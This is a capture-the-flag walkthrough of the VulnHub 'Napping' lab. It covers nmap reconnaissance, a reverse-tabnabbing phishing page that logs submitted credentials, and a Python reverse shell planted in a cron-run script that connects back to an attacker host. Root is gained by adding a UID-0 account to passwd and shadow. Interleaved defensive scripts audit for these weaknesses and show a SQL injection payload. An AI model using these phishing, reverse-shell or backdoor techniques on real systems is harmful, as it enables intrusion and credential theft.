
    VulnHub Lab: Napping

    VSole, 2022-09-29 07:34:39

    0x01 Lab Information

    Download: https://www.vulnhub.com/entry/napping-101,752/
    Release date: 22 October 2021
    Author: hadrian3689
    Description: Even Admins can fall asleep on the job. This works better with VirtualBox rather than VMware
    Changelog: v1.0.1 - 2021-10-30; v1.0.0 - 2021-10-22
    

    0x02 Information Gathering

    Host discovery:

    sudo nmap -sn 192.168.56.1/24
    -sn (no port scan; -sP in older versions)
        This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the host discovery probes. This is often known as a "ping scan", but you can also request that traceroute and NSE host scripts be run. This is by default one step more intrusive than the list scan, and can often be used for the same purposes. It allows light reconnaissance of a target network without attracting much attention. Knowing how many hosts are up is more valuable to attackers than the list provided by list scan of every single IP and host name.
        Systems administrators often find this option valuable as well. It can easily be used to count available machines on a network or monitor server availability. This is often called a ping sweep, and is more reliable than pinging the broadcast address because many hosts do not reply to broadcast queries.
        The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port 443, TCP ACK to port 80, and an ICMP timestamp request by default. When executed by an unprivileged user, only SYN packets are sent (using a connect call) to ports 80 and 443 on the target. When a privileged user tries to scan targets on a local ethernet network, ARP requests are used unless --send-ip was specified. The -sn option can be combined with any of the discovery probe types (the -P* options) for greater flexibility. If any of those probe type and port number options are used, the default probes are overridden. When strict firewalls are in place between the source host running Nmap and the target network, using those advanced techniques is recommended. Otherwise hosts could be missed when the firewall drops probes or their responses.
    

    Going through the hosts that answered (the scan runs as root, so on the local VirtualBox network it uses ARP), the target's IP is 192.168.56.109.

    Port scan:

    sudo nmap -sC -sV -p- 192.168.56.109 -oN napping.nmap
    -sC (default script scan; list the default set with nmap --script-help "default")
        Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
    -sV (version detection; -sR is an alias for -sV)
        Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.
    -p (scan specific ports; -p- means ports 1-65535)
        This option specifies which ports you want to scan and overrides the default. Individual port numbers are OK, as are ranges separated by a hyphen (e.g. 1-1023). The beginning and/or end values of a range may be omitted, causing Nmap to use 1 and 65535, respectively. So you can specify -p- to scan ports from 1 through 65535. Scanning port zero is allowed if you specify it explicitly. For IP protocol scanning (-sO), this option specifies the protocol numbers you wish to scan for (0-255).
        When scanning a combination of protocols (e.g. TCP and UDP), you can specify a particular protocol by preceding the port numbers by T: for TCP, U: for UDP, S: for SCTP, or P: for IP Protocol. The qualifier lasts until you specify another qualifier. For example, the argument -p U:53,111,137,T:21-25,80,139,8080 would scan UDP ports 53, 111, and 137, as well as the listed TCP ports. Note that to scan both UDP and TCP, you have to specify -sU and at least one TCP scan type (such as -sS, -sF, or -sT). If no protocol qualifier is given, the port numbers are added to all protocol lists. Ports can also be specified by name according to what the port is referred to in the nmap-services. You can even use the wildcards * and ? with the names. For example, to scan FTP and all ports whose names begin with "http", use -p ftp,http*. Be careful about shell expansions and quote the argument to -p if unsure.
        Ranges of ports can be surrounded by square brackets to indicate ports inside that range that appear in nmap-services. For example, the following will scan all ports in nmap-services equal to or below 1024: -p [-1024]. Be careful with shell expansions and quote the argument to -p if unsure.
    -oN (normal output to a file)
        Requests that normal output be directed to the given filename. As discussed above, this differs slightly from interactive output.
    

    Note: be careful with -A. It generates a lot of traffic, and if the target device cannot keep up it turns into a DoS scenario. It is better to tailor the nmap command and scripts to the output we actually need, or to the ports found open (which requires a first round of reconnaissance). This improves performance and shortens the scan.

    The scan shows two open ports, 22 and 80, a Linux kernel, and Ubuntu as the distribution.

    0x03 Web Vulnerability Testing

    Next, visit the target's website and look for a way in.

    It is a login page. Capturing the request and feeding it to sqlmap to try injection did not succeed, but there is a registration page below, so register an account and try that.

    Registration goes through without trouble. After logging in there is a feature for submitting links.

    The page says an administrator will review the submissions. If someone is going to review them, we can try phishing to see whether we can capture the administrator's credentials.

    The machine name Napping points at Reverse Tabnabbing, a tab-based phishing attack.

    Background: Reverse Tabnabbing phishing

    When a page uses a link (for example an a tag) with target="_blank" and does not set rel="noopener", it may be open to Reverse Tabnabbing.

    Page A opens a maliciously crafted link to page B. The newly opened page B receives a window.opener reference to page A and can perform certain operations on it; in particular it may assign window.opener.location even though the two pages are on different origins. An attacker uses this to navigate A to a phishing page C. Because the user trusts page A, they are easily deceived by C and leak information. Opening a page with window.open() has the same problem.

    Example:

    A.html

    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>I am trusted page A</title>
    </head>
    <body>
        <h1>I am trusted page A</h1>
        <!-- target="_blank" without rel="noopener": the opened page gets a window.opener reference -->
        <li><a href="http://localhost/b.html" target="_blank">This link may be vulnerable</a></li>
        <!-- window.open() without the 'noopener' feature: same thing -->
        <button onclick="window.open('http://localhost/b.html')">This link may be vulnerable</button>
    </body>
    </html>
    

    B.html

    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>I am malicious page B</title>
    </head>
    <body>
        <script>
            // If we were opened with an opener reference, navigate the original tab to the phishing page
            if (window.opener) {
                window.opener.location = "http://localhost/c.html";
            } else {
                alert("Congratulations, not vulnerable");
            }
        </script>
    </body>
    </html>
    

    C.html

    <!DOCTYPE html>
    <html>
    <head>
        <meta charset="utf-8">
        <title>I am phishing page C</title>
    </head>
    <body>
        <h1>I am phishing page C</h1>
        <li><a href="http://localhost/b.html" target="_blank">This link may be vulnerable</a></li>
        <button onclick="window.open('http://localhost/b.html')">This link may be vulnerable</button>
    </body>
    </html>
    

    Open A.html; it contains the two links that trigger the issue.

    Click a link to trigger the malicious behaviour.

    Note that as soon as the malicious page pops up, the original page A turns into phishing page C: the vulnerability triggered successfully.

    This phishing page looks almost identical to A, but the URL has changed to C.html. The attacker exploits the user's trust in page A to harvest information.

    Note 1: I used Internet Explorer here because the current mainstream browsers block this. I tried Chrome, Edge and Firefox and none of them reproduced this phishing method; only IE surprised me by confirming it.

    Note 2: Note 1 concerns an a tag with target="_blank" and no rel="noopener", where only IE succeeded. But don't forget that opening the page with window.open() can also trigger the vulnerability, and in that case every browser fell.
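
The script below is an added example, not part of the original write-up, that audits a page for the two patterns just described (an a tag with target="_blank" whose rel lacks noopener, and a window.open() call whose feature string lacks noopener) and rewrites them with the fix: rel="noopener noreferrer" on the anchor, and window.open(url, '_blank', 'noopener') for the script call. The sample markup is constructed to mirror A.html plus one already-hardened link; the function and pattern names are this example's own.

```python
"""Audit HTML for the reverse-tabnabbing patterns discussed above and apply the fix.
Added example, not part of the original write-up; the sample page is constructed."""
import re
from html.parser import HTMLParser

# Constructed test page mirroring A.html: one unsafe anchor, one unsafe window.open, one safe anchor.
SAMPLE_PAGE = """<!DOCTYPE html><html><head><title>A</title></head><body>
<li><a href="http://localhost/b.html" target="_blank">possibly vulnerable link</a></li>
<button onclick="window.open('http://localhost/b.html')">possibly vulnerable button</button>
<a href="/help" target="_blank" rel="noopener">already hardened</a>
</body></html>"""

WINDOW_OPEN = re.compile(r"window\.open\(\s*([^)]*)\)")
ANCHOR_TAG = re.compile(r"<a\b([^>]*)>", re.IGNORECASE)


class AnchorAudit(HTMLParser):
    """Collect hrefs of <a target="_blank"> tags whose rel does not contain noopener."""

    def __init__(self):
        super().__init__()
        self.unsafe = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = dict(attrs)
        if (a.get("target") or "").lower() != "_blank":
            return
        rel_tokens = (a.get("rel") or "").lower().split()
        if "noopener" not in rel_tokens:
            self.unsafe.append(a.get("href") or "")


def audit_html(html):
    """Return (unsafe_anchor_hrefs, unsafe_window_open_args) for one document."""
    parser = AnchorAudit()
    parser.feed(html)
    # window.open(url) gives the new window an opener unless the feature string names noopener.
    unsafe_opens = [m.group(1).strip() for m in WINDOW_OPEN.finditer(html)
                    if "noopener" not in m.group(1)]
    return parser.unsafe, unsafe_opens


def harden_html(html):
    """Add rel="noopener noreferrer" to unsafe _blank anchors and the noopener
    feature to single-argument window.open calls."""

    def fix_anchor(m):
        attrs = m.group(1)
        if not re.search(r"""target\s*=\s*["']?_blank""", attrs, re.IGNORECASE):
            return m.group(0)
        if re.search(r"""\brel\s*=\s*["'][^"']*noopener""", attrs, re.IGNORECASE):
            return m.group(0)
        if re.search(r"\brel\s*=", attrs, re.IGNORECASE):
            attrs = re.sub(r"""(\brel\s*=\s*["'])""", r"\g<1>noopener noreferrer ", attrs,
                           count=1, flags=re.IGNORECASE)
        else:
            attrs += ' rel="noopener noreferrer"'
        return "<a" + attrs + ">"

    def fix_open(m):
        args = m.group(1)
        if "noopener" in args or "," in args:
            return m.group(0)  # already has a feature string or extra arguments: leave for manual review
        return "window.open(%s, '_blank', 'noopener')" % args.strip()

    return WINDOW_OPEN.sub(fix_open, ANCHOR_TAG.sub(fix_anchor, html))


if __name__ == "__main__":
    print(audit_html(SAMPLE_PAGE))                     # one unsafe anchor, one unsafe window.open
    print(audit_html(harden_html(SAMPLE_PAGE)))        # ([], [])
```

The audit is deliberately conservative: a window.open() with several arguments is reported but not rewritten, since the feature string may already be doing something the regex cannot judge.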

    [Screenshots: the window.open() variant reproduced in Chrome, Firefox, Edge and IE]

    Starting the phishing

    Build two pages: news.html, which manipulates the trusted page, and the phishing page login.php. Kali's bundled Apache + PHP is used for simple storage of the captured data.

    news.html

    <!DOCTYPE html>
    <html>
    <body>
        <script>
            // Redirect the tab that opened us (the admin's link-review page) to the fake login
            if (window.opener) {
                window.opener.location = "http://192.168.56.102/login.php";
            }
        </script>
    </body>
    </html>
    

    login.php

    <?php
    // Append every POSTed field to access.log, then render a login form that looks like the target's
    $myfile = fopen("access.log", "a") or die("Unable to open file!");
    $txt = http_build_query($_POST, '', ', ') . "\n";
    fwrite($myfile, $txt);
    fclose($myfile);
    ?>
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Login</title>
        <link rel="stylesheet" >
        <style>
            body{ font: 14px sans-serif; }
            .wrapper{ width: 360px; padding: 20px; }
        </style>
    </head>
    <body>
        <div class="wrapper">
            <h2>Login</h2>
            <p>Please fill in your credentials to login.</p>
            <form action="/login.php" method="post">
                <div class="form-group">
                    <label>Username</label>
                    <input type="text" name="username" class="form-control " value="">
                    <span class="invalid-feedback"></span>
                </div>
                <div class="form-group">
                    <label>Password</label>
                    <input type="password" name="password" class="form-control ">
                    <span class="invalid-feedback"></span>
                </div>
                <div class="form-group">
                    <input type="submit" class="btn btn-primary" value="Login">
                </div>
                <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
            </form>
        </div>
    </body>
    </html>
    

    Submit the phishing link through the site.

    Then wait patiently for a bite. The %40 in the captured line is URL-encoded; decoded it is @.

    username=daniel, password=C@ughtm3napping123
    


    Logging in on the web login page with these credentials fails. Recalling that port 22 is open, we guess they might be SSH credentials, and that login succeeds.

    0x04 Privilege Escalation

    From id, daniel belongs to two groups: 1001 (daniel) and 1002 (administrators). Use find to locate the files owned by each group:

    find / -group administrators -type f 2>/dev/null
    find / -group daniel -type f 2>/dev/null
    

    The search turns up nothing useful for the daniel group. Attention turns to query.py, which belongs to the administrators group.

    The script is clearly a check that the website is up. From the file it writes to, or from the scheduled tasks, we can tell that it runs every two minutes, and as a member of administrators we can edit it.
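
The condition just identified (a script run on a schedule by someone else, but writable by the account we hold, here through the administrators group) is worth scripting as a check. The following is an added example, not part of the original write-up: it parses /etc/crontab-style lines (five time fields or an @reboot-style keyword, then the user, then the command) and reports every referenced script the current account can write. The crontab text and the two scripts are constructed in a temporary directory, so it runs without touching the real system; function names are this example's own.

```python
"""Find cron-driven scripts that the current account can modify, the condition
exploited above (query.py is group-writable by administrators and run by root's cron).
Added example, not part of the original write-up; the crontab text and files are
constructed in a temporary directory, so nothing here touches the real system."""
import os
import shlex
import stat
import tempfile


def parse_cron_line(line):
    """Split a system-crontab line (/etc/crontab style, with a user field) into
    (schedule, user, command); returns None for comments, blanks and variable settings."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    tokens = line.split()
    if tokens[0].startswith("@"):            # @reboot, @hourly, ...
        schedule, rest = tokens[0], tokens[1:]
    else:                                    # five time fields
        schedule, rest = " ".join(tokens[:5]), tokens[5:]
    if len(rest) < 2:
        return None
    return schedule, rest[0], " ".join(rest[1:])


def script_paths(command):
    """Absolute paths named in the command, e.g. '/home/adrian/query.py' from
    'python3 /home/adrian/query.py'."""
    return [tok for tok in shlex.split(command) if tok.startswith("/")]


def writable_by(path, uid, gids):
    """True if an account with this uid and these group ids may write the file
    through the owner, group or other write bit (mode bits only; root's override is ignored)."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:   # daniel's case: administrators group
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def find_hijackable(crontab_text, uid, gids):
    """Return [(cron_user, path)] for regular files run from cron that we could edit."""
    hits = []
    for line in crontab_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        _schedule, cron_user, command = parsed
        for path in script_paths(command):
            # isfile() skips devices such as /dev/null, which are world-writable but not scripts
            if os.path.isfile(path) and writable_by(path, uid, gids):
                hits.append((cron_user, path))
    return hits


def demo():
    """Constructed crontab with two scripts: one group-writable (hijackable), one read-only."""
    tmp = tempfile.mkdtemp()
    hijackable = os.path.join(tmp, "query.py")
    readonly = os.path.join(tmp, "cleanup.sh")
    with open(hijackable, "w") as f:
        f.write("import requests\n")
    with open(readonly, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(hijackable, 0o664)   # rw for owner and group, as on the target
    os.chmod(readonly, 0o444)     # nobody can write
    crontab = f"""# constructed /etc/crontab
SHELL=/bin/sh
*/2 * * * * root python3 {hijackable}
*/5 * * * * root {readonly}
@reboot root /nonexistent/reset_users.sh
"""
    return find_hijackable(crontab, os.getuid(), set(os.getgroups()) | {os.getgid()})


if __name__ == "__main__":
    for user, path in demo():
        print(f"{user} runs {path}, which we can modify")
```

On the target the same idea applies to a user crontab read with crontab -l (no user field) and to /etc/cron.d; the group branch of writable_by is the one that matched for daniel.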

    Checking sudo rights shows nothing elevated:

    sudo -l
    -l, --list
        If no command is specified, list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host. A longer list format is used if this option is specified multiple times and the security policy supports a verbose output format.
        If a command is specified and is permitted by the security policy, the fully-qualified path to the command is displayed along with any command line arguments. If a command is specified but not allowed by the policy, sudo will exit with a status value of 1.
    

    The only option left is to use the scheduled script to pop a reverse shell and see whether that yields higher privileges.

    Modify the script:

    import socket, subprocess, os
    from datetime import datetime
    import requests

    # Reverse shell prepended to the script: connect back to the attacker and attach /bin/sh to the socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.56.102", 8888))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])

    # Original site check, left in place
    now = datetime.now()
    r = requests.get('http://127.0.0.1/')
    if r.status_code == 200:
        f = open("site_status.txt", "a")
        dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
        f.write("Site is Up: ")
        f.write(dt_string)
        f.write("\n")
        f.close()
    else:
        f = open("site_status.txt", "a")
        dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
        f.write("Check Out Site: ")
        f.write(dt_string)
        f.write("\n")
        f.close()
    

    The shell comes back as the user adrian, and sudo -l for this user shows that vim can be run with root privileges.

    This is not a full shell, though; we upgrade it through python to get a fully interactive one.

    python3 -c 'import pty;pty.spawn("/bin/bash")'

    ## Local terminal: check the local terminal's TERM value
    (kali㉿kali)-[~/Desktop] $ echo $TERM
    xterm-256color
    ## Target shell: set the environment variables
    adrian@napping:~$ export TERM=xterm-256color
    adrian@napping:~$ export SHELL=/bin/bash
    ## Local terminal: check the terminal's rows and columns
    (kali㉿kali)-[~/Desktop] $ stty size
    24 103
    ## Target shell: Ctrl+Z sends the job to the background and returns to the local terminal
    adrian@napping:~$ ^Z
    [1]+  Stopped        nc -lvp 9091
    ## Local terminal: put the terminal in raw mode without local echo so keystrokes are passed straight to the victim session, then bring the job back with fg
    (kali㉿kali)-[~/Desktop] $ stty raw -echo;fg
    ## The cursor may now sit somewhere in the middle of the terminal; type reset to reset the victim session
    reset
    ## Target shell: give the "new" terminal its rows and columns so it renders correctly
    adrian@napping:~$ stty rows 24 columns 103
    Done
    

    We now have a full shell. Since the user can run vim as root, the natural idea is to edit the passwd file and add a root-privileged account.

    0x05 Adding an Administrator Account

    A hashed password has a fixed format:

    $id$salt$encrypted

    id identifies the hashing algorithm: 1 is MD5, 5 is SHA-256, 6 is SHA-512. SHA-512 is what nearly everything uses today, but MD5 and SHA-256 are still supported. salt is the cryptographic salt, normally generated by the system; encrypted is the hash of the password.

    openssl passwd -6 -salt aaa 1234567
    passwd
        Generation of hashed passwords.
    -6
        Use the SHA256 / SHA512 based algorithms defined by Ulrich Drepper.
    -salt string
        Use the specified salt. When reading a password from the terminal, this implies -noverify.

    This produces a SHA-512 crypt hash of the password 1234567 with the salt aaa.

    In the passwd file each line is one user and is split by colons into seven fields:

    1. Username
    2. Password; x means the password is stored in /etc/shadow
    3. UID; 0 is root
    4. GID, the primary group
    5. Description (GECOS): Full Name, Room Number, Work Phone, Home Phone and Other, in that order
    6. Home directory
    7. Default shell

    Write the user entry into passwd:

    supertest:x:0:0:root:/supertest:/bin/bash
    

    In the shadow file each line is one user and is split by colons into nine fields:

    1. Username
    2. Hashed password
    3. Date of the last password change (days since 1970-01-01)
    4. Minimum number of days between password changes; 0 means no limit
    5. Maximum number of days between password changes, i.e. the password expires after this many days; 99999 means no limit
    6. Number of days of warning before the password expires
    7. Number of days after expiry before the account is disabled
    8. Account expiry date (days since 1970-01-01); empty means the account never expires (0 is ambiguous and should not be used)
    9. Reserved

    Write the password entry into shadow:

    supertest:$6$aaa$rzNpVK12/RIxUFx.HixBbeRuIJYfw78hhQ8ocZfh5S2dIwa1r7dGW52qww4wcngdOzj3A5r9ni9a8C.mruV2M0:19261:0:99999:7:::
    

    Finally, su to the new user switches to root and we have root privileges.
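
From the defender's side, the account just added is easy to spot if anyone looks: a second UID 0 entry in passwd with a usable hash in shadow. The following is an added example, not part of the original write-up, that parses passwd- and shadow-format text using the field layouts listed above, decodes the $id$salt$hash format, converts the day counts to dates, and flags such accounts. The sample entries are constructed: the supertest lines are the ones from this write-up, the others are placeholders (daniel's hash is not a real hash).

```python
"""Parse passwd- and shadow-format text and flag the kind of entry added above:
a second UID-0 account, a usable hash on it, and hashes placed directly in passwd.
Added example, not part of the original write-up; the entries below are constructed
(the supertest lines are the ones from this write-up, the others are placeholders)."""
import re
from datetime import date, timedelta

# Constructed sample files
PASSWD_TEXT = """root:x:0:0:root:/root:/bin/bash
daniel:x:1001:1001::/home/daniel:/bin/bash
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
supertest:x:0:0:root:/supertest:/bin/bash
"""
SHADOW_TEXT = """root:*:19261:0:99999:7:::
daniel:$6$examplesalt$placeholderhash:19261:0:99999:7:::
adrian:!:19261:0:99999:7:::
supertest:$6$aaa$rzNpVK12/RIxUFx.HixBbeRuIJYfw78hhQ8ocZfh5S2dIwa1r7dGW52qww4wcngdOzj3A5r9ni9a8C.mruV2M0:19261:0:99999:7:::
"""

PASSWD_FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "hash", "lastchange", "min", "max", "warn", "inactive", "expire", "reserved")
CRYPT_IDS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512", "y": "yescrypt"}
# $id$salt$digest; the middle group also swallows rounds=/yescrypt parameters when present
CRYPT_RE = re.compile(r"^\$([^$]+)\$(.*)\$([^$]+)$")


def parse_entries(text, fields):
    """Split colon-separated lines into dicts; raises on a line with the wrong field count."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(fields):
            raise ValueError(f"line {lineno}: expected {len(fields)} fields, got {len(parts)}")
        entries.append(dict(zip(fields, parts)))
    return entries


def parse_crypt_hash(field):
    """('locked', None, None) for * or !-prefixed fields, ('empty', ...) for no password,
    else (algorithm, salt, digest) decoded from $id$salt$digest."""
    if field == "":
        return ("empty", None, None)
    if field == "*" or field.startswith("!"):
        return ("locked", None, None)
    m = CRYPT_RE.match(field)
    if not m:
        return ("unknown", None, None)
    return (CRYPT_IDS.get(m.group(1), "id=" + m.group(1)), m.group(2), m.group(3))


def days_to_date(days):
    """Convert a shadow day count (days since 1970-01-01) to a date."""
    return date(1970, 1, 1) + timedelta(days=int(days))


def audit(passwd_text, shadow_text):
    """Return a list of (kind, account, detail) findings."""
    findings = []
    shadow = {e["name"]: e for e in parse_entries(shadow_text, SHADOW_FIELDS)}
    for e in parse_entries(passwd_text, PASSWD_FIELDS):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(("uid0", e["name"], f"home={e['home']} shell={e['shell']}"))
        if e["password"] != "x":          # hash (or nothing) stored directly in passwd
            findings.append(("hash_in_passwd", e["name"], e["password"]))
        s = shadow.get(e["name"])
        if s is None:
            findings.append(("no_shadow_entry", e["name"], ""))
            continue
        algo, salt, _digest = parse_crypt_hash(s["hash"])
        changed = days_to_date(s["lastchange"]) if s["lastchange"] else "unknown"
        if algo == "empty":
            findings.append(("empty_password", e["name"], ""))
        elif e["uid"] == "0" and algo != "locked":
            findings.append(("uid0_loginable", e["name"], f"{algo} salt={salt!r} changed={changed}"))
    return findings


if __name__ == "__main__":
    for kind, account, detail in audit(PASSWD_TEXT, SHADOW_TEXT):
        print(kind, account, detail)
```

Run against real files this needs root to read /etc/shadow; the lastchange date of the injected entry (19261 days, i.e. 2022-09-26) is also a useful pivot for timeline work, since it is whatever the attacker typed rather than a system-maintained value.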

    0x06 Post-mortem Analysis

    Now that we have root, let's see what the system was actually doing.

    First check root's scheduled tasks.

    From the entries: every five minutes the submitted links are deleted, on every reboot the registered users are deleted, and every two minutes nap.py runs.

    import requests
    import re
    import mysql.connector

    mydb = mysql.connector.connect(
        host="localhost",
        user="adrian",
        password="P@sswr0d456",
        database="website"
    )
    mycursor = mydb.cursor()
    mycursor.execute("SELECT * FROM links")
    myresult = mycursor.fetchall()

    data = {"username": "daniel", "password": "C@ughtm3napping123"}

    for x in myresult:
        url1 = x[0]
        try:
            r1 = requests.get(url1, timeout=2)
            search = r1.text
            # Pull the redirect target out of a location.replace(...) or opener.location = ... statement,
            # strip the trailing quote, and submit the credentials to it
            if (search.find('location.replace') != -1):
                match = re.findall(r"http(.*)\);", search)
                new_url = 'http' + match[0].rstrip(match[0][-1])
                r2 = requests.post(new_url, data=data, timeout=2)
            elif (search.find('opener.location') != -1):
                match = re.findall(r"http(.*);", search)
                new_url = 'http' + match[0].rstrip(match[0][-1])
                r2 = requests.post(new_url, data=data, timeout=2)
        except requests.exceptions.ReadTimeout:
            continue
    

    This script confirms the Reverse Tabnabbing idea: it fetches each submitted link, matches the redirect URL in its opener.location or location.replace statement, and POSTs the username and password to that URL. As an imitation of an administrator who falls asleep on the job, it is very faithful. Note that it never runs a browser at all, so the browser-side blocking discussed earlier is irrelevant here; the bot is keyed purely on the text of the page.

    Next, analyze the login page to check whether SQL injection is really absent.

    <?php
    // Initialize the session
    session_start();

    // If the user is already logged in, redirect to the welcome page
    if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){
        header("location: welcome.php");
        exit;
    }

    // Include the config file
    require_once "config.php";

    // Define variables and initialize with empty values
    $username = $password = "";
    $username_err = $password_err = $login_err = "";

    // Process form data when the form is submitted
    if($_SERVER["REQUEST_METHOD"] == "POST"){

        // Check if username is empty
        if(empty(trim($_POST["username"]))){
            $username_err = "Please enter username.";
        } else{
            $username = trim($_POST["username"]);
        }

        // Check if password is empty
        if(empty(trim($_POST["password"]))){
            $password_err = "Please enter your password.";
        } else{
            $password = trim($_POST["password"]);
        }

        // Validate credentials
        if(empty($username_err) && empty($password_err)){
            // Prepare a select statement
            $sql = "SELECT id, username, password FROM users WHERE username = ?";

            if($stmt = $mysqli->prepare($sql)){
                // Bind variables to the prepared statement as parameters
                $stmt->bind_param("s", $param_username);

                // Set parameters
                $param_username = $username;

                // Attempt to execute the prepared statement
                if($stmt->execute()){
                    // Store the result
                    $stmt->store_result();

                    // Check if the username exists; if yes, verify the password
                    if($stmt->num_rows == 1){
                        // Bind result variables
                        $stmt->bind_result($id, $username, $hashed_password);
                        if($stmt->fetch()){
                            if(password_verify($password, $hashed_password)){
                                // Password is correct, so start a new session
                                session_start();

                                // Store data in session variables
                                $_SESSION["loggedin"] = true;
                                $_SESSION["id"] = $id;
                                $_SESSION["username"] = $username;

                                // Redirect the user to the welcome page
                                header("location: welcome.php");
                            } else{
                                // Password is not valid, display a generic error message
                                $login_err = "Invalid username or password.";
                            }
                        }
                    } else{
                        // Username doesn't exist, display a generic error message
                        $login_err = "Invalid username or password.";
                    }
                } else{
                    echo "Oops! Something went wrong. Please try again later.";
                }

                // Close the statement
                $stmt->close();
            }
        }

        // Close the MySQL connection
        $mysqli->close();
    }
    ?>

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Login</title>
        <link rel="stylesheet" >
        <style>
            body{ font: 14px sans-serif; }
            .wrapper{ width: 360px; padding: 20px; }
        </style>
    </head>
    <body>
        <div class="wrapper">
            <h2>Login</h2>
            <p>Please fill in your credentials to login.</p>

            <?php
            if(!empty($login_err)){
                echo '<div class="alert alert-danger">' . $login_err . '</div>';
            }
            ?>

            <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post">
                <div class="form-group">
                    <label>Username</label>
                    <input type="text" name="username" class="form-control <?php echo (!empty($username_err)) ? 'is-invalid' : ''; ?>" value="<?php echo $username; ?>">
                    <span class="invalid-feedback"><?php echo $username_err; ?></span>
                </div>
                <div class="form-group">
                    <label>Password</label>
                    <input type="password" name="password" class="form-control <?php echo (!empty($password_err)) ? 'is-invalid' : ''; ?>">
                    <span class="invalid-feedback"><?php echo $password_err; ?></span>
                </div>
                <div class="form-group">
                    <input type="submit" class="btn btn-primary" value="Login">
                </div>
                <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
            </form>
        </div>
    </body>
    </html>
    

    The core of the page is lines 36-84. The username goes into a prepared statement through bind_param, and the stored hash from the single returned row is checked with password_verify before anything is output to the page, so we can reasonably conclude there is no SQL injection. (The one thing visible in this code that is not an injection: the submitted username is echoed back into the form's value attribute without htmlspecialchars(), an output-encoding issue separate from the query.)
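
The program below is an added example, not the lab's code, that reproduces the control flow above in Python with an in-memory SQLite table standing in for PHP/mysqli (the user, password and PBKDF2 hash scheme are constructed). It goes one step beyond the page's conclusion: it shows why the bound parameter matters even though the password is verified outside SQL. If the username were concatenated into the query, a UNION payload could make the one returned row carry a hash the attacker chose, and password_verify would then pass with the attacker's own password.

```python
"""Why the login code above is not injectable, and why the bound parameter matters
even though the password is verified outside SQL.  Added example, not from the
original write-up: Python/sqlite3 stands in for the page's PHP/mysqli, and the
user, password and hash scheme are constructed."""
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 20_000  # kept low for the demo; production code uses a tuned, slow hash


def password_hash(password, salt=None):
    """salt$digest string, standing in for PHP's password_hash()."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def password_verify(password, stored):
    """Constant-time comparison, standing in for PHP's password_verify()."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate.hex(), digest_hex)


def make_db():
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    db.execute("INSERT INTO users VALUES(?, ?, ?)", (1, "daniel", password_hash("correct horse")))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Same control flow as the page's login.php, but with the username concatenated into SQL."""
    rows = db.execute(
        "SELECT id, username, password FROM users WHERE username = '%s'" % username).fetchall()
    if len(rows) != 1:            # mirrors the num_rows == 1 check
        return None
    uid, _name, hashed = rows[0]
    return uid if password_verify(password, hashed) else None


def login_safe(db, username, password):
    """The page's approach: bound parameter, then password_verify on the stored hash."""
    rows = db.execute(
        "SELECT id, username, password FROM users WHERE username = ?", (username,)).fetchall()
    if len(rows) != 1:
        return None
    uid, _name, hashed = rows[0]
    return uid if password_verify(password, hashed) else None


def union_payload(attacker_password):
    """Injection that makes the single returned row carry a hash the attacker knows,
    so password_verify passes without the victim's password (no real user is named 'x')."""
    return "x' UNION SELECT 1, 'daniel', '%s' -- " % password_hash(attacker_password)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, union_payload("anything"), "anything"))  # 1: logged in as id 1
    print(login_safe(db, union_payload("anything"), "anything"))        # None: no such user
```

With the bound parameter the whole payload is treated as a username value, the lookup finds nothing, and the num_rows == 1 check fails before any hash is compared.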

    0x07 References

    https://developer.mozilla.org/en-US/docs/Web/API/Window/opener#browser_compatibility
    https://xz.aliyun.com/t/7080
    https://mp.weixin.qq.com/s/6BRhAOdleFt1sty9I0P9QQ
    https://3gstudent.github.io/Linux%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81Hash-%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%E4%B8%8E%E7%A0%B4%E8%A7%A3%E6%96%B9%E6%B3%95%E7%9A%84%E6%8A%80%E6%9C%AF%E6%95%B4%E7%90%86
    
